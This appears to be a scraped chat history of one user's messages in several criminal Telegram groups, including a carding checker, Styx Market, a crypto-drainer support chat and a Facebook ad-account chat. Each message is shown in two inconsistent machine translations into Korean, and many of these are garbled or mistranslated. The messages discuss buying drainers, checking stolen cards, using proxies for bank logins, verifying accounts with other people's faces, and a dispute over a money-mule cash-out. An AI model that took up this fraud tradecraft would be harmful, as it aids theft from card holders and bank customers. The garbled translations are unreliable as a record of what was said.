보냐2026-02-19 16:52
where어디에서
B
보냐2026-02-17 14:37
누가 가게에 괜찮은 자동차 몇 대를 구해줄 수 있을까?누가 좋은 차들이 있는 쇼핑몰을 추천해 줄 수 있을까요?
B
보냐2026-02-17 12:10
어디든 원하시는 곳이면 다 해줄 거예요😂어디든 기분 내키는 대로 해줄 거야😂
-- EMPIRE CHAT (24개 메시지) --
B
보냐2026-03-14 13:17
방법은 이미 알아냈지만, 설명하기엔 너무 귀찮네요.이미 어떻게 하는지 알지만 설명하기 귀찮아
B
보냐2026-03-14 13:17
그 녀석은 무슨 일이 있어도 널 박살 낼 거야.어떤 상황이든 그 녀석은 널 속일 거야
B
보냐2026-03-12 17:16
각기 다른 방식으로.각기 다르게
B
보냐2026-03-12 17:08
+ 게다가 지금 폭풍이 많이 몰아치고 있어요.+ 지금 폭풍이 심해요
B
보냐2026-03-12 17:07
검은색이라면, 분명검은색이라면 내기를 걸었을 텐데
B
보냐2026-03-12 17:07
어떤 제안인지에 따라 다르겠지만, 흰색이라면 그렇습니다.어떤 제안인지에 따라 다르겠지만, 흰색이라면 그렇습니다.
B
보냐2026-03-12 17:06
완전히 다른 두 세상이에요두 개의 서로 다른 세계는 바로
B
보냐2026-03-12 17:06
다른 건 없어요전혀 다른 건 없어요
B
보냐2026-03-12 17:06
PC에서만 사용할 수 있도록 설정할 수 있습니다.거기서 PC만 표시되도록 설정할 수 있습니다
B
보냐2026-03-12 17:05
구글은 내가 생각하는 것만큼 효과적이지 않다.제 생각에는 구글이 그렇게 효과적이지는 않은 것 같아요
B
보냐2026-03-12 17:05
글쎄요, 전 구글은 안 하고 그냥 페이스북만 해요.글쎄요, 전 구글은 안 쓰고 페이스북만 쓰거든요
B
보냐2026-03-12 17:05
어쨌든 그 모든 과정에서 리가투어를 하나 찾아내야만 한다면 말이죠.이 모든 멍청이들을 한데 묶어 전쟁터로 보내야 한다는 전제 하에
B
보냐2026-03-12 17:04
불량품과 아키들이 폭풍처럼 흩날린다. 등등.리젝트, 계정이 폭풍처럼 휙휙 사라져요. 등등
B
보냐2026-03-12 17:04
세상이 다 장미꽃만 피는 건 아니야, 친구.아니, 형, 이건 다 꽃들이야
B
보냐2026-03-12 17:03
신뢰도가 더 높은 모든 항공사의 정기 항공권모두 신뢰도가 가장 높은 일반 배터리들입니다
B
보냐2026-03-12 17:03
현재 시장에는 괜찮은 에이전시가 하나도 없습니다.지금 시장에는 괜찮은 에이전시가 없네요.
B
보냐2026-03-12 17:02
무서운 것보다 더 신경 쓰이는무서운 것보다는 오히려 신경이 더 쓰이는 편이에요
B
보냐2026-03-12 17:02
암호화폐, 도박 본능, 그리고 흑인성까지 모두 쏟아져 나온다암호화폐, 도박, 그리고 어두운 이야기들이 쏟아지고 있다
B
보냐2026-03-12 17:01
시 당국이 마지막으로 한 일은 2d를 해킹한 것이었습니다.2D로 만든 시티가 최근에 꽤 괜찮았어
B
보냐2026-03-12 17:01
등반을 할 때, 제 입장에서 보든 예산 측면에서 보든, 2D 등반을 하려면 테스트에 1~2k zeles를 써야 하는데, 그건 오래가지 않을 겁니다.찾아보면 나올 수는 있겠지만, 내 돈으로 하든 예산으로 하든 2D로 만들 수 있는 걸 찾으려면 테스트에만 1~2k 제라를 써야 하고, 그래도 오래 가지는 않을 거예요.
B
보냐2026-03-12 17:00
지금 따르고 있어요나는 붓는다
B
보냐2026-03-12 16:59
(백인 구직자에게는 그러한 요건이 없기 때문이다)왜냐하면 화이트 오퍼에는 그런 요구 사항이 없기 때문이죠)
B
보냐2026-02-14 14:33
AML 심사 과정에서 드레이너가 있는 사람은 누구인가요? 보증인이 ‘dep’ 또는 ‘ready’ 상태인 경우에만 해당됩니다.AML 테스트용 드레이너 가지고 계신 분 계신가요? 디포용만 가능한가요, 아니면 보증인용 완제품도 가능한가요?
B
보냐2026-01-11 03:14
페이스북 비트에 누군가가 있고, 친구도 한 명 있습니다. 페이스북 비트를 보충해야 하는데 가격은 협의 가능합니다.페이스북에 글을 올린 사람이 있고, 욕설도 있습니다. 페이스북 계정에 충전해 주셔야 하는데, 가격은 협의합시다.
-- SТYХ СНAT [ STYXMARKET.ST ] (게시물 2개) --
B
보냐2025-12-05 12:04
청구서 필요, Payzaty, Cashfree, Eportal 3ds청구서 필요, Payzaty, Cashfree, Eportal 3ds
B
보냐2025-11-22 11:14
채팅 보증인이 있나요?여기 채팅 관리자 계신가요?
-- 트래픽 중재 채팅 (게시물 2개) --
B
보냐2025-11-24 14:50
100%100%
B
보냐2025-11-24 14:49
Tg 채널이 탈취될 예정입니다트레이딩 채널이 사라질 거예요
-- Raven CC 검사기 (게시물 2개) --
B
보냐2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
보냐2025-11-21 21:18
/check/check
-- Vision Browser 채팅 (메시지 2개) --
B
보냐2025-11-14 16:47
감사합니다.감사합니다
B
보냐2025-11-14 16:47
vicen werk in ru?비젠 워크는 러시아어인가요?
-- 💬ONE|채팅 (86개 메시지) --
B
보냐2025-03-05 17:06
얘들아, 패드를 살 수 있는 가게 좀 알려줘.친구들, 장비 대여할 수 있는 곳 좀 알려줘
B
보냐2025-03-05 16:22
정말 미친 듯이라도 할 수가 없어그냥 매니큐어조차 해줄 수 없어요
B
보냐2025-03-05 16:22
마찬가지로마찬가지로
B
보냐2025-03-05 16:21
멘토가 학생들과 채팅방을 운영하고 있는지 아닌지, 제발 대답 좀 해.젠장, 누가 좀 대답 좀 해줘. 멘토가 학생들과 채팅을 하는지 아닌지.
B
보냐2025-03-05 16:10
그리고 ts는 누구예요?그건 누구야?
B
보냐2025-03-05 15:44
어렵지는 않지만, 여기에는 완전한 설명서가 없고 튜터만 있습니다.거기서는 어렵지 않지만, 여기에는 완전한 매뉴얼이 없고 멘토들에게만 있습니다
B
보냐2025-03-05 15:42
기본적으로, 방법을 안다면 그렇습니다.사실, 할 줄 안다면 그렇죠
B
보냐2025-03-05 15:42
반나절반나절 동안
B
보냐2025-03-05 15:42
첫 번째 그룹에는 600명이 있는데, 그는 답장을 안 하고 있어요.첫 번째 600명에 대해서는 답변하지 않습니다
B
보냐2025-03-05 15:41
돈이 있다면 200달러에 나온 걸 사세요.돈이 있다면 200달러를 요구하는 그 여자를 데려가세요
B
보냐2025-03-05 13:55
학생용 채팅방이 있다는 걸 알려주는 데 정말 뛰어난 사람은 누구일까요?판타스틱 학원에 다니는 학생들끼리 대화할 수 있는 채팅방이 있나요?
B
보냐2025-03-03 15:10
수표영수증
B
보냐2025-03-03 15:10
청소기를 돌리는 사람청소기를 돌리고 있는
B
보냐2025-03-03 15:10
알겠습니다있다
B
보냐2025-03-03 15:10
아마도 소프트웨어를 다루는 창녀들도 있을 거예요.이건 분명 소프트웨어가 엉망인 거겠지
B
보냐2025-03-03 15:09
그때는그랬다
B
보냐2025-03-03 15:09
아, 그거 좋네요.오, 이거 괜찮네
B
보냐2025-03-03 15:09
트리누리우에트 루루트리누리우에트 루루
B
보냐2025-03-03 15:09
그리고 그것들이 수집되고 있습니다그리고 그것들을 모으고
B
보냐2025-03-03 15:09
팁은 그냥 거기 앉아서 포장지를 뜯고만 있어티프가 앉아서 과자 봉지를 뜯고 있다
B
보냐2025-03-03 15:04
왜 우크라이나 번호판이 있는 건가요?П 왜 우크라이나 번호로 해야 하나요?
B
보냐2025-03-03 15:03
내가 “kc.”라고 말했어.나는 kc라고 말했다
B
보냐2025-03-03 15:03
알겠어요.알겠습니다
B
보냐2025-03-03 15:03
일이 복잡해지면, 보울러 모자를 잃어버리게 될 거야.여기선 네 냄비가 날아갈 것 같네
B
보냐2025-03-03 15:03
젠장, 내가 루를 불에서 내리는 동안 네가 FB 레쿨을 몇 번이나 돌릴지 한번 비교해 보자.젠장, 자, 한번 비교해 보자. 내가 루를 찍는 동안 넌 페이스북 리커를 몇 번이나 돌릴 수 있겠어?
B
보냐2025-03-03 15:02
에스코트를 위해에스코트
B
보냐2025-03-03 15:02
이 녀석들은 빌어먹을 자위광을 만들어낼 만한 치티치티 같은 성향을 가지고 있다.이 놈들은 발전이라니, 씨발 자위나 하라고
B
보냐2025-03-03 15:02
젠장, 여기 다 워커들이네.젠장, 여기 온통 똥파리들뿐이네
B
보냐2025-03-03 15:02
어떤 종류의 테이블인가요?어떤 테이블이 있나요?
B
보냐2025-03-03 15:01
목소리가 아름답다면 30을 받을 수 있을 거예요.목소리가 아름답다면 30은 네 것이 될 것이다
B
보냐2025-03-03 15:01
돈이 더 있어요거기가 돈이 더 많아
B
보냐2025-03-03 15:01
제 회사에서 일해 보시지 않겠습니까?문화센터에 와서 나랑 같이 일하자
B
보냐2025-03-03 15:00
아니요아니요
B
보냐2025-03-03 14:59
플래테감플라테감
B
보냐2025-03-03 14:59
+ 리플레이를 어떻게 다루는지 잘 모르겠어요+ 전 포브테그에 대해 잘 모르겠어요
B
보냐2025-03-03 14:59
좋은 아이템은 좀처럼 구하기 힘들다.좋은 드롭을 찾기는 정말 힘들어요
B
보냐2025-03-03 14:58
아니면 1.0 버전이 있는 건가요?아니면 1.0이 있나요?
B
보냐2025-03-03 14:58
여기에는 2.0 피쉬가 단 하나뿐입니다.그리고 여기 2.0 전류용 피시가 있네요
B
보냐2025-03-03 14:58
아니면 2.0보다는 1.0이 낫다.뭐, 2.0보다는 1.0이 낫지
B
보냐2025-03-03 14:57
매머드와 함께매머드와 함께
B
보냐2025-03-03 14:57
2.0은 빈둥거리며 놀고만 있어서는 안 된다.2.0은 헛소리나 하며 앉아 있기엔 별로야
B
보냐2025-03-03 14:57
저는 교통 분야를 더 전문으로 하는 편이에요.트래픽 면에서는 이제 제가 더 많아요
B
보냐2025-03-03 14:57
Roo의 ‘X’ 시리즈입니다손에 있는 X 표시들
B
보냐2025-03-03 14:56
하지만 이건 광고 문구가 아닙니다하지만 이건 광고 팀이 아닙니다
B
보냐2025-03-03 14:56
그렇죠. 그런 사람을 알고 있어요.(하는) 아는 사람이 있어요
B
보냐2025-03-03 14:56
하루에 400~500을 버는 방법을 안다면 이야기가 달라지죠.아니, 실력만 있다면 하루에 400~500 정도는 쉽게 벌 수 있잖아
B
보냐2025-03-03 14:55
그래서 뭐가 그렇게 대수란 말인가?)뭐, 여기 뭘 깜빡했나 보네 )
B
보냐2025-03-03 14:55
매뉴얼로 연결되는 링크가 있습니다거기에 매뉴얼 링크가 있습니다
B
보냐2025-03-03 14:54
바로 이런 손들이죠이런 손들이 일을 벌일 거야
B
보냐2025-03-03 14:54
빌어먹을, 침이나 흘리며 빤히 쳐다보면서 빌어먹을 손 한 번 잡으려고 안달이 나 있다.젠장, 루를 시작하려면 침을 흘리고 눈을 양쪽으로 뗄 수도 있겠네
B
보냐2025-03-03 14:54
글쎄, 뭐가 문제야? 똑같은 일이잖아.뭐, 그럼 여기서 뭐가 문제야? 똑같은 작업인데
B
보냐2025-03-03 14:53
그 지역에 도착하려면 한 달이 걸릴 거예요한 달 안에 그 구역까지 데려다 줄 거예요
B
보냐2025-03-03 14:53
그리고 갈 데도 없어. 머리가 좀 있다면 알아서 할 거야. 머리가 없다면, 여기서 나가.그나저나 여기선 할 일도 없네. 머리가 있으면 알아서 해결할 테고, 없으면 뭐 하러 여기 있겠어.
B
보냐2025-03-03 14:53
뭘 원하세요?도대체 뭘 원했던 거야?
B
보냐2025-03-03 14:53
광고광고
B
보냐2025-03-03 14:52
여기 온 지 이틀 됐는데 2.0은 별로 재미없네요. 전 멋지다고 생각했었는데요.여기 온 지 이틀째인데 2.0은 별로 흥미가 없네. 뭔가 재밌을 줄 알았는데.
B
보냐2025-03-03 14:52
그리고 매머드 한 마리 드세요그리고 매머드를 키우고
B
보냐2025-03-03 14:52
머리를 써서 무슨 말을 할지 생각해 보세요.무슨 대답을 할지 좀 생각해 봐야겠다
B
보냐2025-03-03 14:52
비밀 따위는 없다여기에는 비밀 같은 건 없어요
B
보냐2025-03-03 14:52
그가 당신에게 무엇을 줄까요?그것이 여러분에게 무엇을 줄까요?
B
보냐2025-03-03 14:52
글쎄요, 설명서에 똑같은 정보가 다 실려 있다면 무슨 의미가 있겠어요.그건 그렇고, 설명서에 그 모든 정보가 다 들어 있다면 무슨 의미가 있겠어요?
B
보냐2025-03-03 14:51
그는 너희 놈들의 모든 질문에 답할 시간이 있을 거야어떻게 여러분 모두에게 일일이 답장을 다 할 수 있겠어요?
B
보냐2025-03-03 14:51
정말 대단한 연습이네요.어떤 수행인가요?
B
보냐2025-03-03 14:51
그 안에는 100명이 있다.세상에, 거기 사람 100명씩이나 있네
B
보냐2025-03-03 14:51
돈 좀 주시면, 클램프에 들어 있는 설명서를 드릴게요.돈 좀 보내주실래요? 보내주시면 고정 게시물에서 설명서를 드릴게요.
B
보냐2025-03-03 14:50
수정하는 과정에서고정 중
B
보냐2025-03-03 14:50
이 모든 것을 배우기 위해 설명서가 필요하지는 않습니다.아, 다들 교육 따위는 필요 없어. 매뉴얼이 있잖아.
B
보냐2025-03-03 14:50
2.0은 그 자체로 그런 거죠.2.0 예전에도 그랬고 지금도 마찬가지다
B
보냐2025-03-03 14:50
도대체 뭐가 문제야?이건 도대체 무슨 문제야?
B
보냐2025-03-03 14:48
직접 시작하셨나요?너는 벌써 시작했어?
B
보냐2025-03-03 14:48
미친 짓은 안 해전혀 안 되네
B
보냐2025-03-03 14:48
lk에 암살 요청이 들어왔습니다LK에 살인이 발생했다
B
보냐2025-03-03 14:48
lk에 무슨 일이 있는 거야?LC에 대한 어떤 워크인가요?
B
보냐2025-03-03 14:48
이 중에서 너희 놈들, 너희 말대로라면, 어느 쪽이야?도대체 누구한테서 이런 말들을 배운 거야, 도대체 어떻게 표현한 건지
B
보냐2025-03-03 14:47
여기서 무슨 말씀을 하시는지 잘 모르겠습니다.이 부분에서 네가 무슨 말을 했는지 잘 이해가 안 가네
B
보냐2025-03-03 14:46
로그인되어 있다면, 좋겠네요.만약 개인 정보 페이지에 접속한다면, ZBS
B
보냐2025-03-03 14:46
음, 그 사람들은 로그인하나요?그럼 프로필 페이지에 들어가나요?
B
보냐2025-03-03 14:45
그들이 어떻게 그런 장면을 찍는지 모르겠어요.글쎄, 그거 어떻게 찍는지 잘 모르겠네
B
보냐2025-03-03 14:45
버려야 할 강아지들?정리 대상인가요?
B
보냐2025-03-03 14:45
젠장, 여기 빌어먹을 누르는 버튼이 있잖아뭐, 거기서 푹신푹신 밟고 다니는 건 또 뭐야
B
보냐2025-03-03 14:42
제가 직접 따르고 있어요내가 직접 붓고 있어
B
보냐2025-03-03 14:42
젠장, 이게 개똥같은 짓이 아니라는 걸 깨달았어.씨발, 난 그걸 알았는데, 개똥같은 소리는 아니야
B
보냐2025-03-03 14:41
야, 여기 칩으로는 아무것도 못 사. 이건 월급날용 칩이야.형, 여기서는 피쉬로 아무것도 팔지 않아. 여기선 피쉬로 결제만 가능해.
B
보냐2025-03-03 14:41
알겠어요, 부을 곳이 없네요알겠어, 여기엔 부을 곳이 없구나
B
보냐2025-03-03 14:40
레귤러 2.0인 것 같아요.일반적인 2.0 같은 거
B
보냐2025-03-03 14:40
교통이 마비될 정도는 아니잖아요그런데 여기서는 트래픽을 바로 흘려보내지 않네요
-- Фбстор - 성공한 웹마스터들의 채팅방! (23개 게시물) --
B
보냐2025-02-26 07:51
뭐, 네 얼굴이 뭐든 간에 마음대로 해.뭐, 어쨌든 거기서 누가 신경이나 쓰겠어
B
보냐2025-02-26 07:50
200₽짜리 남학생.음, 여학생에게 200₽를 줘
B
보냐2025-02-26 07:50
잘 될 거예요괜찮겠네
B
보냐2025-02-26 07:50
길거리에서 노숙자를 보게 될 거예요.길거리에서 노숙자를 붙잡아 데려가라
B
보냐2025-02-26 07:50
그러니 누구의 얼굴이든 간에, 다들 자기 얼굴을 믿는 법이다.다들 자기 얼굴로 인증하니까, 남의 건 신경 쓸 필요도 없지
B
보냐2025-02-26 07:50
네 얼굴에.자신의 얼굴에
B
보냐2025-02-26 07:49
하지만 사실은, 뭐 어쨌든, 난 이미 10번이나 해봤어.하지만 사실, 뭐 어쨌든 난 계정을 10개 정도 인증받았어
B
보냐2025-02-26 07:49
그러니까 말이야, 넌 그냥 헛소리를 지껄이고 있는 거잖아.그럼, 험담을 늘어놓는 거냐?
B
보냐2025-02-26 07:49
다음과 같이 할 수 있습니다.가능합니다
B
보냐2025-02-26 07:49
네 얼굴에.자신의 얼굴에
B
보냐2025-02-16 20:26
무슨 훈련을 시키거나 교통 체증을 유발하는 식으로 그들을 엉망으로 만드는 대신.그냥 겉치레로 교육 같은 걸 내세우면서 트래픽만 끌어모으는 건 아니잖아
B
보냐2025-02-16 20:25
평범한 UBT, 유튜브 등등.레이나, 일반 UBT, TT, 유튜브 등
B
보냐2025-02-15 17:31
XzХз
B
보냐2025-02-15 17:31
훈련이라는 명목으로교육을 구실로
B
보냐2025-02-15 17:31
운하로채널로
B
보냐2025-02-15 17:31
그냥 사람들이 몰려들어서 생기는 혼잡일 뿐이에요.그냥 사람들이 보내는 트래픽이 꽤 많이 들어오네요
B
보냐2025-02-15 17:31
그래서 그 사람이 자기 채널을 전부 구독하라고 하네요그 사람이 자기 채널을 전부 구독하라고 하더라고요
B
보냐2025-02-15 16:36
꼭 쓸 필요는 없습니다후이뉴가 제안합니다. 쓰지 않으셔도 됩니다.
B
보냐2025-02-06 15:11
따르는 법의 기본을 모르면, 결국만약 주조하는 법 같은 기본적인 것도 모른다면 어떻게 하겠어?
B
보냐2025-02-06 15:11
aipi를 변경하는 버튼이 있으니, 적어도 구글에서 검색이라도 해보세요.거기 있는 버튼을 누르면 IP 주소가 바뀌는데, 구글에서 검색해 봐
B
보냐2025-02-06 15:10
🤨🤨
B
보냐2025-02-06 15:09
거기에 있는 aipi는 회전시켜서 변경할 수 있습니다.거기서 API의 로테이션을 변경할 수 있습니다
B
보냐2025-02-06 15:09
왜 1이냐고요? 모바일과 똑같으니까요.왜 1인가요? 이건 모바일이잖아요
-- CryptoGrab - 상호 지원 채팅방 (게시물 10개) --
B
보냐2025-02-06 15:31
그렇게 간단한 문제는 아니에요일이 그렇게 간단하지는 않아요
B
보냐2025-02-06 15:31
간단해요.이지
B
보냐2025-01-23 20:30
단 한 가지 예도 없다단 한 가지 사례도 없다
B
보냐2025-01-23 20:30
인터넷에서 AML 검사 광고를 하나도 찾을 수 없었다는 게 전혀 웃기지 않네요.근데 인터넷에서 AML 테스트 광고를 도무지 찾을 수가 없다는 게 참 웃기네
B
보냐2025-01-23 17:20
AML에는 아무것도 없습니다.AML에는 아예 아무것도 없네요
B
보냐2025-01-23 17:20
페이스북에서 AML을 사용해 봤는데, 인터넷에서 찾을 수 없는 오래된 번들까지 모두 처리할 수 있어서 꽤 유용하더군요.페이스북에서 AML에 대해 찾아봤는데, 인터넷에서도 미국 관련해서 제대로 된 정보나 오래된 자료조차 찾을 수 없었어요.
B
보냐2025-01-23 17:19
음, 어떤 제안을 하실 생각인가요?그건 그렇고, 대체 어떤 제안을 할 생각이야?
B
보냐2025-01-23 17:16
AML을 사용하시나요?너는 AML 하냐?
B
보냐2025-01-21 20:38
페이스북을 운영하는 분이라면 누구나 몇 가지 의문점을 명확히 하고 싶어 할 것입니다.페이스북에 게시물을 올리는 분 계신가요? 몇 가지 질문이 있어서 확인하고 싶습니다.
B
보냐2025-01-20 11:08
AML에 대한 크레오스 예시를 알고 계신 분 계신가요?AML용 크레오 예시를 아시는 분 계신가요?
-- 롤렉스 | 일반 채팅방 (28개 메시지) --
B
보냐2024-09-11 15:29
리투아니아 선수들은 어떤 코트에서 경기를 하고 있나요?리투아니아는 도대체 어떤 경기장에서 박살 나고 있는 거야?
B
보냐2024-09-11 15:21
나사 건드리는 거야?야, 너 미쳤냐?
B
보냐2024-09-11 15:20
그저 사이트들이 규제가 너무 심해서, 거기서 이것저것 만지작거리느라 정말 골치 아프다는 거지그냥 플랫폼들이 작업을 엄청나게 제한하고, 거기다 처리해야 할 골치 아픈 일들이 너무 많아서
B
보냐2024-09-11 15:19
머릿속에 떠오른 테마가 하나 있어요. 만약 그들이 그걸 해낸다면, 진짜 끝내주겠네요.거기서 아이디어 하나 떠올려서 글 하나 썼는데, 만약 실제로 만들어지면 진짜 끝내주겠네
B
보냐2024-09-11 15:19
핀카에는 로그가 별로 보이지 않네요.핀카 관련 로고는 딱히 눈에 띄지 않네요
B
보냐2024-09-11 15:19
모든 공연장들에서 정말 엉망진창인 일이 벌어지고 있어.아, 저 녀석들 거기서 모든 경기장과 관련해 무슨 엉터리 짓을 하고 있나 봐
B
보냐2024-09-11 15:16
그게 바로 제가 말하려는 거예요. 마치 ‘포드’ 위에 ‘포드’를 얹은 것 같아요.뭐, 내가 말했잖아. 사기 위에 또 사기라고.
B
보냐2024-09-11 15:15
지금 뭐가 더 나아진 건지 도무지 모르겠네요. 핀란드의 모든 사람들이 일을 하지 않는 것 같거든요.지금 뭐가 더 잘 되는지 도무지 모르겠네요. 다들 핀크에서 뭔가 안 되는 것 같더라고요.
B
보냐2024-09-11 15:08
글쎄요, 프록시를 통해 운이 따를지 말지는 반반이겠네요.글쎄, 프록시를 잘 활용하면 50대 50 정도겠지
B
보냐2024-09-11 15:07
하지만 알아두셔야 할 점은, 요즘은 럭스 프록시를 사용하면 바이버에서도 로그인할 때 시스템이 오작동을 일으킨다는 겁니다.근데 알아둬, 요즘 고급 프록시를 쓰면 바이버에 접속할 때조차 접속이 끊기곤 해
B
보냐2024-09-11 15:07
글쎄요, EU 캔에 대해서는 잘 모르겠네요.글쎄, 난 EU 은행들에 대해서는 잘 모르겠어
B
보냐2024-09-11 15:07
lk에서В лк
B
보냐2024-09-11 15:06
예전에는 델리카테센에 워크인 냉장고가 10개나 있었는데예전에는 10회 분량의 락셔리를 보관했었죠
B
보냐2024-09-11 15:06
음, 922도 1인치 들어갔고 그대로 유지되고 있네요.음, 922도 1명이 들어가서 지키고 있네
B
보냐2024-09-11 15:05
3번이나 다녀온 뒤에도 여전히 사적인 모습은 그들을 깜짝 놀라게 한다.3번이나 방문한 후에도 프라이빗 채팅에서조차 그들을 속인다
B
보냐2024-09-11 15:05
대리점 1곳당 1~2개 은행인 경우프로xy 1개당 1~2개의 뱅크가 있다면
B
보냐2024-09-11 15:05
글쎄요, 어느 은행이냐에 따라 다르겠죠글쎄, 어느 은행이냐에 따라 다르겠지만
B
보냐2024-09-11 15:04
락셰리 허튼소리 속의 대리인들은 종종 지저분하곤 한다라크셰리 후이니아의 프록시는 종종 더럽다
B
보냐2024-09-11 08:44
그거 자고 있나요?그 사람은 자고 있나요?
B
보냐2024-09-11 08:40
아, 그거 정말 좋은 생각이에요.ZBS에 대해 생각해 냈어
B
보냐2024-09-11 08:40
거기 벼룩시장 같은 건 없나요?그런데 거기엔 여기저기서 볼 수 있는 그런 벼룩시장 같은 게 없나?
B
보냐2024-09-11 08:40
완전 엉망이야후에보
B
보냐2024-09-11 08:39
빌야빌야
B
보냐2024-09-11 08:39
채팅방이 있나요?거기 채팅방 있나요?
B
보냐2024-09-11 08:38
아시는 분 계신가요?아시는 분 계신가요?
B
보냐2024-09-11 08:38
핀카에 사는 사람들은 TG를 사용하나요?핀란드에서는 사람들이 TG를 사용하나요?
B
보냐2024-09-10 12:14
감사합니다.고마워요
B
보냐2024-09-10 12:13
핀란드 시간은 몇 시인가요?지금 핀카에서 시간이 좀 지났네
-- 최신 소식/인증/수익 창출💃🛍 (게시물 37개) --
B
보냐2024-06-16 17:17
그녀를 맹렬히 옹호하는 사람은 아무도 보이지 않네요여기서는 그녀를 열렬히 옹호하는 사람들을 볼 수 없네요
B
보냐2024-06-16 17:17
뭐, 어쨌든 상황을 모두 설명했으니 이제 각자 선택을 하면 되는 거고, 관리자 파샤만이 그녀를 옹호하고 있다는 사실만으로도 많은 것을 말해주고 있습니다.자, 상황은 다 설명했으니 이제 각자 선택을 하면 되겠네요. 그리고 그녀를 옹호하는 사람이 관리자 파샤뿐이라는 사실만 봐도 많은 것을 말해줍니다.
B
보냐2024-06-16 17:15
그리고 그녀는 또다시 돈을 지급하지 않았다그녀는 또다시 돈을 갚지 않았다
B
보냐2024-06-16 17:15
아니요, 그녀가 우리에게 송금해 줬는데, 우리가 그 돈을 다시 이체할 수 있는 주 계좌가 없어서 어쩔 수 없이 비카에게 편지를 보냈습니다.아니, 그녀가 그 돈을 우리에게 넘겼는데, 당시 우리 쪽에는 돈을 이체할 수 있는 주요 입금 수단이 없어서, 최후의 수단으로 위키에 글을 올렸어요.
B
보냐2024-06-16 17:14
처음에는 우리도 괜찮았지만, 요즘 들어 네 돈이 자꾸만 사라지고 있어.처음에는 저희 쪽도 모든 게 정상이었는데, 요즘 들어서는 자금이 자꾸만 사라지고 있어요
B
보냐2024-06-16 17:14
제가 스팸을 보내는 건가요? 전 그냥 여기 앉아서 사람들에게 진실을 말하고 있을 뿐인데. 원하시면 무시하셔도 됩니다. 여러분이 어떻게 일하는지 사람들에게 알려주세요.저한테 스팸이 온 건가요? 전 사람들에게 진실을 말하고 있을 뿐인데, 지워버려도 뭐가 달라지겠어요? 사람들이 여러분이 어떻게 일하는지 알게 둬야죠.
B
보냐2024-06-16 17:13
이런 것 중 하나가 있다면만약 여러분에게 이런 일이 생긴다면
B
보냐2024-06-16 17:13
그러니 이제 여러분이 되돌아볼 때입니다그러니 이제 한번 깊이 생각해 볼 때입니다
B
보냐2024-06-16 17:13
저희도 nei와 오랫동안 협력해 왔는데, 이번이 두 번째 사례입니다.저희도 그녀와 오랫동안 함께 일해 왔는데, 이번이 벌써 두 번째 상황입니다.
B
보냐2024-06-16 17:13
그리고 그녀는 그 내용을 녹음해 두고는 “어떻게 돌아가는지 알잖아”라고 말했죠.그녀는 GS를 기록해 두고, 당신이 그 작동 원리를 알고 있다고 말했어요
B
보냐2024-06-16 17:13
그게 바로 그 일이에요. 처음부터 설명해 볼게요. 우리는 돈을 인출하려고 그녀의 카드를 받아서 6만을 입금했는데, 그녀가 돈을 찾으러 갔더니 ATM이 카드를 삼켜버려서 돈이 없을 거라고 적혀 있더라고요. 그게 전부예요. 우리는 그냥 6만을 날려버린 셈이죠.바로 그 일이에요. 자, 처음부터 설명해 드릴게요. 우리가 그녀에게 현금 인출용 카드를 받아서 6만을 입금했더니, 그녀가 돈을 인출하러 갔다가 돈이 나오지 않을 거라고 하더라고요. 왠지 ATM이 카드를 삼켜버렸다는 핑계를 대며, 결국 우리는 6만을 그냥 날려버린 셈이 됐죠.
B
보냐2024-06-16 17:11
우리를 꽉 붙잡고 있는 건 그녀가 아니야아니, 우리가 그녀에게 있는 건가
B
보냐2024-06-16 17:11
비록 6만 개가 도난당하기는 했지만비록 우리에게서 6만을 훔쳐갔지만
B
보냐2024-06-16 17:11
정상이라고? 여기에서 모든 걸 설명해 뒀잖아. 넌 우리가 바보라고 하는 거잖아.정상이라고요? 우린 여기서 다 설명해 줬는데, 당신은 우리가 바보라고 하네요
B
보냐2024-06-16 17:10
당신은 그녀를 옹호하고 있군요당신은 그녀를 옹호하고 있군요
B
보냐2024-06-16 17:10
그녀는 아직도 우리 돈을 가지고 있다우리 돈이 그녀에게 남아 있다
B
보냐2024-06-16 17:10
그들 모두모두
B
보냐2024-06-16 17:10
한 남자가 6만 달러를 건넸는데, 그녀는 돈이 없다고 했다.누군가 그 사람에게 6만을 입금해 줬는데, 그는 돈이 없을 거라고 말했다
B
보냐2024-06-16 17:10
설명*설명*
B
보냐2024-06-16 17:10
전체 상황이 이미 설명해 드렸습니다너한테 상황을 다 설명해 줬어
B
보냐2024-06-16 17:09
누가 약을 흘린 거야? 그녀일까, 우리일까.드롭을 하는 건 그녀일까, 우리일까?
B
보냐2024-06-16 17:09
은행에 6만 달러가 있는데, 그 돈은 어디에 있는 거야?6만 푼을 입금했는데 돈은 어디 갔나요?
B
보냐2024-06-16 17:09
상황에 대해 이미 모든 설명을 들었으니, 성별이 무엇이든 상관없습니다.어떤 여자들이 이 상황을 다 설명해 줬는지, 성별은 전혀 중요하지 않아
B
보냐2024-06-16 17:08
6만 달러를 인출하고 오늘은 이만 끝내자.6만 벌고 그만두자
B
보냐2024-06-16 17:08
아니면 적당한 선에서나 엿이나 먹어라.아니면 도대체 뭐가 합리적인 범위 내에 있는 거야?
B
보냐2024-06-16 17:08
사람들은 낼 돈이 전혀 없다사람들은 어디서 돈을 마련할까요?
B
보냐2024-06-16 17:08
그런데 그는 카드가 찢어져서 돈이 다 떨어졌다고 말하더군요.그리고는 “카드가 걸렸어, 돈이 없어”라고 말하더라
B
보냐2024-06-16 17:08
한 남자에게 6만 달러가 쏟아졌고, 그녀는 총을 쏘러 갔다.한 여자에게 6만을 입금해 주자, 그녀는 촬영하러 갔다
B
보냐2024-06-16 17:07
그럼 사실대로 말해 줄 거지.그럼 그 점을 근거를 들어 설명해 봐
B
보냐2024-06-16 17:07
그럼 도대체 누구 탓이야, 도대체 누가 날 이 지경으로 만든 거야?그럼 도대체 누가 잘못한 거야, 내가 멍청이냐?
B
보냐2024-06-16 17:07
할 말 없나요?할 말이 없나요?
B
보냐2024-06-16 17:07
아니면 빌어먹을 비밀번호를 입력할 수가 없었거나.아니면 뭐, 손이 왜 이리 구부러져서 핀을 제대로 누르지도 못했나
B
보냐2024-06-16 17:06
도대체 ATM이 어떻게 카드를 끼게 만들 수 있는 거야?도대체 ATM이 어떻게 카드를 삼켜버릴 수 있는 거야?
B
보냐2024-06-16 17:06
바보들흡입 현상
B
보냐2024-06-16 17:06
그런데 넌 그 여자를 위해 미친 듯이 힘쓰고 있잖아.너희는 도대체 왜 여기서 그 여자 때문에 게임을 하는 거야?
B
보냐2024-06-16 17:06
